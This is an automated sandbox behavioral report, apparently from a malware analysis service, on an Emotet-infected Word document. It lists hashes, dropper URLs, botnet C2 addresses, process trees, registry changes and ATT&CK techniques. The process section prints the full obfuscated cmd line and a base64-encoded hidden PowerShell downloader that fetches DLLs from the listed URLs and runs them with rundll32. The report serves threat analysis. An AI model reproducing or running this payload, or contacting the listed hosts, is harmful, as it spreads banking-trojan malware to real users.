Behavioral Report

Analysis

max time kernel
144s
max time network
145s
platform
windows7_x64
resource
win7v20201028
submitted
11-02-2021 19:40

Sharing

Copy URL

Twitter E-mail

Report Files Registry Network Processes Mutex Misc

General

Target

625fb60da12e4d1af4f6feb933ce621d6a2a51d59b6f24d441b633440482d32c.doc
Size

145KB
MD5

9291595e34c9041583fc3f39237bed69
SHA1

969da17d764592dd8a037a0e50f797ed2c38445d
SHA256

625fb60da12e4d1af4f6feb933ce621d6a2a51d59b6f24d441b633440482d32c
SHA512

227d707be6d1ef1870f4069d54ce14fbadc48785cd21cd38f86c552e508fed0774e05366fd80faa304ac5b2f23c6924f0c68d1af9cd5b8c09522295e93c16438

Score

10^/10

emotet epoch3 lea banker trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://buarf.com/vcds-throttle-w4z41/pqqn/

exe.dropper

http://vataas.com/3325390551/5W/

exe.dropper

https://blog.tqdesign.vn/banner/uW/

exe.dropper

https://www.abyssos.eu/wp-content/p/

exe.dropper

http://gieoduyen.vn/css/PxmtB/

exe.dropper

http://bambathamobileloans.co.za/cgi-bin/X/

Extracted

Family

emotet

Botnet

Epoch3

132.248.38.158:80

203.157.152.9:7080

157.245.145.87:443

110.37.224.243:80

70.32.89.105:8080

185.142.236.163:443

192.241.220.183:8080

91.83.93.103:443

54.38.143.245:8080

192.210.217.94:8080

37.205.9.252:7080

78.90.78.210:80

182.73.7.59:8080

163.53.204.180:443

91.75.75.46:80

172.104.46.84:8080

161.49.84.2:80

27.78.27.110:443

203.160.167.243:80

109.99.146.210:8080

rsa_pubkey.plain

Extracted

Family

emotet

Botnet

LEA

80.158.3.161:443

80.158.51.209:8080

80.158.35.51:80

80.158.63.78:443

80.158.53.167:80

80.158.62.194:443

80.158.59.174:8080

80.158.43.136:80

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 896 1784 cmd.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	896	1784	cmd.exe

Blocklisted process makes network request 11 IoCs

Processes:

powershell.exerundll32.exe

flow	pid	process
6	568	powershell.exe
8	568	powershell.exe
10	568	powershell.exe
12	568	powershell.exe
14	568	powershell.exe
16	568	powershell.exe
18	1176	rundll32.exe
19	1176	rundll32.exe
22	1176	rundll32.exe
25	1176	rundll32.exe
26	1176	rundll32.exe

Loads dropped DLL 12 IoCs

Processes:

rundll32.exerundll32.exerundll32.exe

pid	process
1652	rundll32.exe
1652	rundll32.exe
1652	rundll32.exe
1652	rundll32.exe
2024	rundll32.exe
2024	rundll32.exe
2024	rundll32.exe
2024	rundll32.exe
744	rundll32.exe
744	rundll32.exe
744	rundll32.exe
744	rundll32.exe

Drops file in System32 directory 4 IoCs

Processes:

powershell.exerundll32.exerundll32.exerundll32.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\Fdneawah\rzjojtn.jcn	rundll32.exe
File created	C:\Windows\SysWOW64\Fdneawah\bktxjravnik.dll	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\Fdneawah\rzjojtn.jcn	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

TTPs:

System Information Discovery
Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

TTPs:

Modify Registry

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

776 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exerundll32.exerundll32.exe

pid process

568 powershell.exe
568 powershell.exe
1176 rundll32.exe
1176 rundll32.exe
1176 rundll32.exe
1176 rundll32.exe
1176 rundll32.exe
744 rundll32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 568 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

776 WINWORD.EXE
776 WINWORD.EXE

pid	process
776	WINWORD.EXE

pid	process
568	powershell.exe
568	powershell.exe
1176	rundll32.exe
1176	rundll32.exe
1176	rundll32.exe
1176	rundll32.exe
1176	rundll32.exe
744	rundll32.exe

description	pid	process
Token: SeDebugPrivilege	568	powershell.exe

pid	process
776	WINWORD.EXE
776	WINWORD.EXE

Suspicious use of WriteProcessMemory 44 IoCs

Processes:

cmd.exepowershell.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exe

description	pid	process	target process
PID 896 wrote to memory of 324	896	cmd.exe	msg.exe
PID 896 wrote to memory of 324	896	cmd.exe	msg.exe
PID 896 wrote to memory of 324	896	cmd.exe	msg.exe
PID 896 wrote to memory of 568	896	cmd.exe	powershell.exe
PID 896 wrote to memory of 568	896	cmd.exe	powershell.exe
PID 896 wrote to memory of 568	896	cmd.exe	powershell.exe
PID 568 wrote to memory of 1624	568	powershell.exe	rundll32.exe
PID 568 wrote to memory of 1624	568	powershell.exe	rundll32.exe
PID 568 wrote to memory of 1624	568	powershell.exe	rundll32.exe
PID 1624 wrote to memory of 1652	1624	rundll32.exe	rundll32.exe
PID 1624 wrote to memory of 1652	1624	rundll32.exe	rundll32.exe
PID 1624 wrote to memory of 1652	1624	rundll32.exe	rundll32.exe
PID 1624 wrote to memory of 1652	1624	rundll32.exe	rundll32.exe
PID 1624 wrote to memory of 1652	1624	rundll32.exe	rundll32.exe
PID 1624 wrote to memory of 1652	1624	rundll32.exe	rundll32.exe
PID 1624 wrote to memory of 1652	1624	rundll32.exe	rundll32.exe
PID 1652 wrote to memory of 2024	1652	rundll32.exe	rundll32.exe
PID 1652 wrote to memory of 2024	1652	rundll32.exe	rundll32.exe
PID 1652 wrote to memory of 2024	1652	rundll32.exe	rundll32.exe
PID 1652 wrote to memory of 2024	1652	rundll32.exe	rundll32.exe
PID 1652 wrote to memory of 2024	1652	rundll32.exe	rundll32.exe
PID 1652 wrote to memory of 2024	1652	rundll32.exe	rundll32.exe
PID 1652 wrote to memory of 2024	1652	rundll32.exe	rundll32.exe
PID 2024 wrote to memory of 516	2024	rundll32.exe	rundll32.exe
PID 2024 wrote to memory of 516	2024	rundll32.exe	rundll32.exe
PID 2024 wrote to memory of 516	2024	rundll32.exe	rundll32.exe
PID 2024 wrote to memory of 516	2024	rundll32.exe	rundll32.exe
PID 2024 wrote to memory of 516	2024	rundll32.exe	rundll32.exe
PID 2024 wrote to memory of 516	2024	rundll32.exe	rundll32.exe
PID 2024 wrote to memory of 516	2024	rundll32.exe	rundll32.exe
PID 516 wrote to memory of 1176	516	rundll32.exe	rundll32.exe
PID 516 wrote to memory of 1176	516	rundll32.exe	rundll32.exe
PID 516 wrote to memory of 1176	516	rundll32.exe	rundll32.exe
PID 516 wrote to memory of 1176	516	rundll32.exe	rundll32.exe
PID 516 wrote to memory of 1176	516	rundll32.exe	rundll32.exe
PID 516 wrote to memory of 1176	516	rundll32.exe	rundll32.exe
PID 516 wrote to memory of 1176	516	rundll32.exe	rundll32.exe
PID 1176 wrote to memory of 744	1176	rundll32.exe	rundll32.exe
PID 1176 wrote to memory of 744	1176	rundll32.exe	rundll32.exe
PID 1176 wrote to memory of 744	1176	rundll32.exe	rundll32.exe
PID 1176 wrote to memory of 744	1176	rundll32.exe	rundll32.exe
PID 1176 wrote to memory of 744	1176	rundll32.exe	rundll32.exe
PID 1176 wrote to memory of 744	1176	rundll32.exe	rundll32.exe
PID 1176 wrote to memory of 744	1176	rundll32.exe	rundll32.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\625fb60da12e4d1af4f6feb933ce621d6a2a51d59b6f24d441b633440482d32c.doc"

Drops file in Windows directory
Modifies Internet Explorer settings
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx

PID:776

C:\Windows\system32\cmd.exe

cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQALQBWAEEAUgBJAGEAQgBMAEUAIAAgAEMAdQAxACAAKABbAHQAWQBwAEUAXQAoACIAewAyAH0AewA0AH0AewAwAH0AewAzAH0AewAxAH0AIgAtAGYAJwBlACcALAAnAFIARQBDAHQAbwByAHkAJwAsACcAUwAnACwAJwBNAC4ASQBPAC4ARABpACcALAAnAFkAUwBUACcAKQAgACkAIAAgADsAIAAgAFMAZQB0AC0AaQBUAGUAbQAgACAAdgBBAFIASQBhAEIATABlADoAMgBvAHkAawA4ACAAKABbAHQAeQBwAEUAXQAoACIAewA1AH0AewAwAH0AewAxAH0AewA2AH0AewAyAH0AewAzAH0AewA0AH0AIgAgAC0ARgAnAHYAaQBjACcALAAnAGUAJwAsACcAbgB0AG0AYQAnACwAJwBuACcALAAnAEEARwBFAFIAJwAsACcAcwBZAFMAdABFAG0ALgBuAGUAdAAuAHMARQByACcALAAnAHAATwBpACcAKQAgACAAKQA7ACAAIAAkAE0AeABtAGQAZQBlAHgAPQAkAEwAXwBfAEoAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFgANQA5AEkAOwAkAFgAMwA5AEsAPQAoACcAVQA4ACcAKwAnADUAUQAnACkAOwAgACAAJABDAHUAMQA6ADoAIgBDAFIAYABFAEEAVABFAGQASQByAGAARQBgAGMAdABPAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AEYAMAB6ADIAeAB6ACcAKwAnAGgAewAwAH0AJwArACcATgAnACsAJwBvAHUAJwArACcAbQBlAHMAbQB7ADAAJwArACcAfQAnACkALQBGACAAIABbAEMASABhAHIAXQA5ADIAKQApADsAJABSADQANABQAD0AKAAoACcARAA2ACcAKwAnADcAJwApACsAJwBNACcAKQA7ACAAKAAgAHYAQQBSAEkAYQBCAGwARQAgADIAbwB5AGsAOAAgACAAKQAuAFYAYQBsAFUAZQA6ADoAIgBzAGAAZQBDAHUAcgBpAHQAWQBQAFIATwBgAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAJwArACcAMQAyACcAKQApADsAJABYADEANABCAD0AKAAnAEYAJwArACgAJwAyADMAJwArACcAUAAnACkAKQA7ACQAWABrAG0ANQBuAG4AZAAgAD0AIAAoACcAUAAnACsAKAAnAF8ANQAnACsAJwBPACcAKQApADsAJABaADQAMgBMAD0AKAAoACcAUgAnACsAJwA5ADAAJwApACsAJwBZACcAKQA7ACQAVQB3AGUAbwA2AGUAcwA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9ACcAKwAnAEYAMAB6ADIAeAB6AGgAewAnACsAJwAwAH0ATgBvAHUAbQBlACcAKwAnAHMAbQAnACsAJwB7ACcAKwAnADAAfQAnACkAIAAtAEYAIAAgAFsAQwBoAGEAUgBdADkAMgApACsAJABYAGsAbQA1AG4AbgBkACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABCADcANABSAD0AKAAoACcATAAnACsAJwA5ADMAJwApACsAJwBKACcAKQA7ACQARwA4AGoAXwBfAGIAbAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEYAYQByAHIAdwByAG0APQAoACgAJwBzACcAKwAnAGcAIAB5ACcAKQArACcAdwAgACcAKwAnAGEAJwArACgAJwBoACcAKwAnADoALwAvAGIAJwApACsAJwB1ACcAKwAoACcAYQByACcAKwAnAGYALgAnACkAKwAnAGMAJwArACcAbwAnACsAJwBtAC8AJwArACgAJwB2AGMAZABzACcAKwAnAC0AdABoAHIAbwB0AHQAJwArACcAbAAnACsAJwBlAC0AJwApACsAKAAnAHcANAB6ADQAMQAvAHAAcQAnACsAJwBxAG4ALwAnACsAJwAhACcAKQArACgAJwBzACcAKwAnAGcAIAAnACkAKwAoACcAeQB3ACcAKwAnACAAYQAnACkAKwAoACcAaAA6AC8AJwArACcALwAnACkAKwAnAHYAJwArACcAYQAnACsAJwB0AGEAJwArACcAYQBzACcAKwAoACcALgAnACsAJwBjAG8AJwArACcAbQAvADMAMwAnACsAJwAyADUAMwA5ADAAJwApACsAJwA1ADUAJwArACgAJwAxAC8ANQAnACsAJwBXAC8AJwApACsAJwAhACcAKwAnAHMAZwAnACsAKAAnACAAeQB3ACcAKwAnACAAYQBoACcAKQArACgAJwBzADoAJwArACcALwAvACcAKwAnAGIAbABvAGcALgAnACkAKwAnAHQAJwArACgAJwBxAGQAZQAnACsAJwBzAGkAZwAnACsAJwBuAC4AdgBuACcAKwAnAC8AYgAnACkAKwAnAGEAbgAnACsAKAAnAG4AZQByAC8AJwArACcAdQAnACsAJwBXAC8AIQAnACkAKwAoACcAcwAnACsAJwBnACAAJwApACsAKAAnAHkAJwArACcAdwAgAGEAJwApACsAJwBoACcAKwAoACcAcwA6ACcAKwAnAC8ALwB3ACcAKQArACgAJwB3ACcAKwAnAHcALgBhAGIAeQAnACkAKwAnAHMAcwAnACsAKAAnAG8AcwAuAGUAdQAnACsAJwAvAHcAJwArACcAcAAtAGMAJwArACcAbwBuACcAKQArACcAdAAnACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACgAJwAvACcAKwAnAHAAJwArACcALwAhAHMAZwAgAHkAJwApACsAJwB3ACAAJwArACcAYQAnACsAJwBoADoAJwArACgAJwAvAC8AZwAnACsAJwBpACcAKQArACgAJwBlAG8AZAB1AHkAZQAnACsAJwBuAC4AJwArACcAdgAnACsAJwBuAC8AJwApACsAJwBjACcAKwAnAHMAJwArACcAcwAvACcAKwAoACcAUAB4ACcAKwAnAG0AdABCACcAKQArACgAJwAvACEAJwArACcAcwBnACcAKQArACcAIAB5ACcAKwAoACcAdwAnACsAJwAgAGEAaAA6ACcAKQArACgAJwAvACcAKwAnAC8AYgAnACkAKwAoACcAYQBtAGIAYQAnACsAJwB0ACcAKQArACgAJwBoAGEAJwArACcAbQBvACcAKwAnAGIAaQBsACcAKQArACgAJwBlAGwAJwArACcAbwBhAG4AJwApACsAJwBzACcAKwAoACcALgBjACcAKwAnAG8ALgB6ACcAKQArACgAJwBhAC8AYwBnAGkAJwArACcALQBiACcAKwAnAGkAbgAnACkAKwAnAC8AWAAnACsAJwAvACcAKQAuACIAUgBlAFAAYABMAGEAQwBFACIAKAAoACgAJwBzAGcAJwArACcAIAB5AHcAJwArACcAIAAnACkAKwAnAGEAaAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEcAOABqAF8AXwBiAGwALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBQAEwAYABJAFQAIgAoACQAWABfADgAVAAgACsAIAAkAE0AeABtAGQAZQBlAHgAIAArACAAJABRADUAOQBJACkAOwAkAFMAXwA5AFUAPQAoACgAJwBVACcAKwAnADQAMgAnACkAKwAnAFQAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABSAHQANgBoAGoAdwA3ACAAaQBuACAAJABGAGEAcgByAHcAcgBtACkAewB0AHIAeQB7ACgAJgAoACcATgBlAHcALQBPACcAKwAnAGIAagBlACcAKwAnAGMAdAAnACkAIABzAHkAUwB0AEUATQAuAG4ARQBUAC4AdwBFAGIAYwBMAEkARQBuAHQAKQAuACIAZABgAG8AYABXAE4AbABvAEEAYABEAGYASQBMAEUAIgAoACQAUgB0ADYAaABqAHcANwAsACAAJABVAHcAZQBvADYAZQBzACkAOwAkAEUAMgA0AEwAPQAoACcAUAAnACsAKAAnADkANwAnACsAJwBKACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAJwArACcAbQAnACkAIAAkAFUAdwBlAG8ANgBlAHMAKQAuACIATABgAGUAbgBHAHQAaAAiACAALQBnAGUAIAA0ADcAMQAyADAAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAnACsAJwAyACcAKQAgACQAVQB3AGUAbwA2AGUAcwAsACgAJwBBACcAKwAoACcAbgB5AFMAdAByACcAKwAnAGkAJwApACsAJwBuAGcAJwApAC4AIgBUAG8AYABTAGAAVABSAEkAbgBHACIAKAApADsAJABTADEANABXAD0AKAAoACcAUQA1ACcAKwAnADgAJwApACsAJwBDACcAKQA7AGIAcgBlAGEAawA7ACQAWQA2ADIAWAA9ACgAJwBWADcAJwArACcAMQBLACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUAA2ADEAQQA9ACgAJwBPADQAJwArACcAMgBEACcAKQA=

Process spawned unexpected child process
Suspicious use of WriteProcessMemory

PID:896

C:\Windows\system32\msg.exe

msg Admin /v Word experienced an error trying to open the file.

PID:324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -w hidden -enc UwBFAFQALQBWAEEAUgBJAGEAQgBMAEUAIAAgAEMAdQAxACAAKABbAHQAWQBwAEUAXQAoACIAewAyAH0AewA0AH0AewAwAH0AewAzAH0AewAxAH0AIgAtAGYAJwBlACcALAAnAFIARQBDAHQAbwByAHkAJwAsACcAUwAnACwAJwBNAC4ASQBPAC4ARABpACcALAAnAFkAUwBUACcAKQAgACkAIAAgADsAIAAgAFMAZQB0AC0AaQBUAGUAbQAgACAAdgBBAFIASQBhAEIATABlADoAMgBvAHkAawA4ACAAKABbAHQAeQBwAEUAXQAoACIAewA1AH0AewAwAH0AewAxAH0AewA2AH0AewAyAH0AewAzAH0AewA0AH0AIgAgAC0ARgAnAHYAaQBjACcALAAnAGUAJwAsACcAbgB0AG0AYQAnACwAJwBuACcALAAnAEEARwBFAFIAJwAsACcAcwBZAFMAdABFAG0ALgBuAGUAdAAuAHMARQByACcALAAnAHAATwBpACcAKQAgACAAKQA7ACAAIAAkAE0AeABtAGQAZQBlAHgAPQAkAEwAXwBfAEoAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFgANQA5AEkAOwAkAFgAMwA5AEsAPQAoACcAVQA4ACcAKwAnADUAUQAnACkAOwAgACAAJABDAHUAMQA6ADoAIgBDAFIAYABFAEEAVABFAGQASQByAGAARQBgAGMAdABPAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AEYAMAB6ADIAeAB6ACcAKwAnAGgAewAwAH0AJwArACcATgAnACsAJwBvAHUAJwArACcAbQBlAHMAbQB7ADAAJwArACcAfQAnACkALQBGACAAIABbAEMASABhAHIAXQA5ADIAKQApADsAJABSADQANABQAD0AKAAoACcARAA2ACcAKwAnADcAJwApACsAJwBNACcAKQA7ACAAKAAgAHYAQQBSAEkAYQBCAGwARQAgADIAbwB5AGsAOAAgACAAKQAuAFYAYQBsAFUAZQA6ADoAIgBzAGAAZQBDAHUAcgBpAHQAWQBQAFIATwBgAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAJwArACcAMQAyACcAKQApADsAJABYADEANABCAD0AKAAnAEYAJwArACgAJwAyADMAJwArACcAUAAnACkAKQA7ACQAWABrAG0ANQBuAG4AZAAgAD0AIAAoACcAUAAnACsAKAAnAF8ANQAnACsAJwBPACcAKQApADsAJABaADQAMgBMAD0AKAAoACcAUgAnACsAJwA5ADAAJwApACsAJwBZACcAKQA7ACQAVQB3AGUAbwA2AGUAcwA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9ACcAKwAnAEYAMAB6ADIAeAB6AGgAewAnACsAJwAwAH0ATgBvAHUAbQBlACcAKwAnAHMAbQAnACsAJwB7ACcAKwAnADAAfQAnACkAIAAtAEYAIAAgAFsAQwBoAGEAUgBdADkAMgApACsAJABYAGsAbQA1AG4AbgBkACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABCADcANABSAD0AKAAoACcATAAnACsAJwA5ADMAJwApACsAJwBKACcAKQA7ACQARwA4AGoAXwBfAGIAbAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEYAYQByAHIAdwByAG0APQAoACgAJwBzACcAKwAnAGcAIAB5ACcAKQArACcAdwAgACcAKwAnAGEAJwArACgAJwBoACcAKwAnADoALwAvAGIAJwApACsAJwB1ACcAKwAoACcAYQByACcAKwAnAGYALgAnACkAKwAnAGMAJwArACcAbwAnACsAJwBtAC8AJwArACgAJwB2AGMAZABzACcAKwAnAC0AdABoAHIAbwB0AHQAJwArACcAbAAnACsAJwBlAC0AJwApACsAKAAnAHcANAB6ADQAMQAvAHAAcQAnACsAJwBxAG4ALwAnACsAJwAhACcAKQArACgAJwBzACcAKwAnAGcAIAAnACkAKwAoACcAeQB3ACcAKwAnACAAYQAnACkAKwAoACcAaAA6AC8AJwArACcALwAnACkAKwAnAHYAJwArACcAYQAnACsAJwB0AGEAJwArACcAYQBzACcAKwAoACcALgAnACsAJwBjAG8AJwArACcAbQAvADMAMwAnACsAJwAyADUAMwA5ADAAJwApACsAJwA1ADUAJwArACgAJwAxAC8ANQAnACsAJwBXAC8AJwApACsAJwAhACcAKwAnAHMAZwAnACsAKAAnACAAeQB3ACcAKwAnACAAYQBoACcAKQArACgAJwBzADoAJwArACcALwAvACcAKwAnAGIAbABvAGcALgAnACkAKwAnAHQAJwArACgAJwBxAGQAZQAnACsAJwBzAGkAZwAnACsAJwBuAC4AdgBuACcAKwAnAC8AYgAnACkAKwAnAGEAbgAnACsAKAAnAG4AZQByAC8AJwArACcAdQAnACsAJwBXAC8AIQAnACkAKwAoACcAcwAnACsAJwBnACAAJwApACsAKAAnAHkAJwArACcAdwAgAGEAJwApACsAJwBoACcAKwAoACcAcwA6ACcAKwAnAC8ALwB3ACcAKQArACgAJwB3ACcAKwAnAHcALgBhAGIAeQAnACkAKwAnAHMAcwAnACsAKAAnAG8AcwAuAGUAdQAnACsAJwAvAHcAJwArACcAcAAtAGMAJwArACcAbwBuACcAKQArACcAdAAnACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACgAJwAvACcAKwAnAHAAJwArACcALwAhAHMAZwAgAHkAJwApACsAJwB3ACAAJwArACcAYQAnACsAJwBoADoAJwArACgAJwAvAC8AZwAnACsAJwBpACcAKQArACgAJwBlAG8AZAB1AHkAZQAnACsAJwBuAC4AJwArACcAdgAnACsAJwBuAC8AJwApACsAJwBjACcAKwAnAHMAJwArACcAcwAvACcAKwAoACcAUAB4ACcAKwAnAG0AdABCACcAKQArACgAJwAvACEAJwArACcAcwBnACcAKQArACcAIAB5ACcAKwAoACcAdwAnACsAJwAgAGEAaAA6ACcAKQArACgAJwAvACcAKwAnAC8AYgAnACkAKwAoACcAYQBtAGIAYQAnACsAJwB0ACcAKQArACgAJwBoAGEAJwArACcAbQBvACcAKwAnAGIAaQBsACcAKQArACgAJwBlAGwAJwArACcAbwBhAG4AJwApACsAJwBzACcAKwAoACcALgBjACcAKwAnAG8ALgB6ACcAKQArACgAJwBhAC8AYwBnAGkAJwArACcALQBiACcAKwAnAGkAbgAnACkAKwAnAC8AWAAnACsAJwAvACcAKQAuACIAUgBlAFAAYABMAGEAQwBFACIAKAAoACgAJwBzAGcAJwArACcAIAB5AHcAJwArACcAIAAnACkAKwAnAGEAaAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEcAOABqAF8AXwBiAGwALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBQAEwAYABJAFQAIgAoACQAWABfADgAVAAgACsAIAAkAE0AeABtAGQAZQBlAHgAIAArACAAJABRADUAOQBJACkAOwAkAFMAXwA5AFUAPQAoACgAJwBVACcAKwAnADQAMgAnACkAKwAnAFQAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABSAHQANgBoAGoAdwA3ACAAaQBuACAAJABGAGEAcgByAHcAcgBtACkAewB0AHIAeQB7ACgAJgAoACcATgBlAHcALQBPACcAKwAnAGIAagBlACcAKwAnAGMAdAAnACkAIABzAHkAUwB0AEUATQAuAG4ARQBUAC4AdwBFAGIAYwBMAEkARQBuAHQAKQAuACIAZABgAG8AYABXAE4AbABvAEEAYABEAGYASQBMAEUAIgAoACQAUgB0ADYAaABqAHcANwAsACAAJABVAHcAZQBvADYAZQBzACkAOwAkAEUAMgA0AEwAPQAoACcAUAAnACsAKAAnADkANwAnACsAJwBKACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAJwArACcAbQAnACkAIAAkAFUAdwBlAG8ANgBlAHMAKQAuACIATABgAGUAbgBHAHQAaAAiACAALQBnAGUAIAA0ADcAMQAyADAAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAnACsAJwAyACcAKQAgACQAVQB3AGUAbwA2AGUAcwAsACgAJwBBACcAKwAoACcAbgB5AFMAdAByACcAKwAnAGkAJwApACsAJwBuAGcAJwApAC4AIgBUAG8AYABTAGAAVABSAEkAbgBHACIAKAApADsAJABTADEANABXAD0AKAAoACcAUQA1ACcAKwAnADgAJwApACsAJwBDACcAKQA7AGIAcgBlAGEAawA7ACQAWQA2ADIAWAA9ACgAJwBWADcAJwArACcAMQBLACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUAA2ADEAQQA9ACgAJwBPADQAJwArACcAMgBEACcAKQA=

Blocklisted process makes network request
Drops file in System32 directory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory

PID:568

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Users\Admin\F0z2xzh\Noumesm\P_5O.dll AnyString

Suspicious use of WriteProcessMemory

PID:1624

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Users\Admin\F0z2xzh\Noumesm\P_5O.dll AnyString

Loads dropped DLL
Suspicious use of WriteProcessMemory

PID:1652

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\SysWOW64\rundll32.exe "C:\Users\Admin\F0z2xzh\Noumesm\P_5O.dll",#1

Loads dropped DLL
Drops file in System32 directory
Suspicious use of WriteProcessMemory

PID:2024

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fdneawah\rzjojtn.jcn",GlRuwwFjsvMVwYa

Suspicious use of WriteProcessMemory

PID:516

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fdneawah\rzjojtn.jcn",#1

Blocklisted process makes network request
Drops file in System32 directory
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory

PID:1176

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fdneawah\bktxjravnik.dll",#1 zAIAACoAAABGAGQAbgBlAGEAdwBhAGgAXAByAHoAagBvAGoAdABuAC4AagBjAG4AAAA=

Loads dropped DLL
Drops file in System32 directory
Suspicious behavior: EnumeratesProcesses

PID:744

Network

MITRE ATT&CK Matrix

Collection

Command and Control

Credential Access

Defense Evasion

Modify Registry

T1112

Discovery

System Information Discovery

T1082

Execution

Exfiltration

Impact

Initial Access

Lateral Movement

Persistence

Privilege Escalation

Replay Monitor

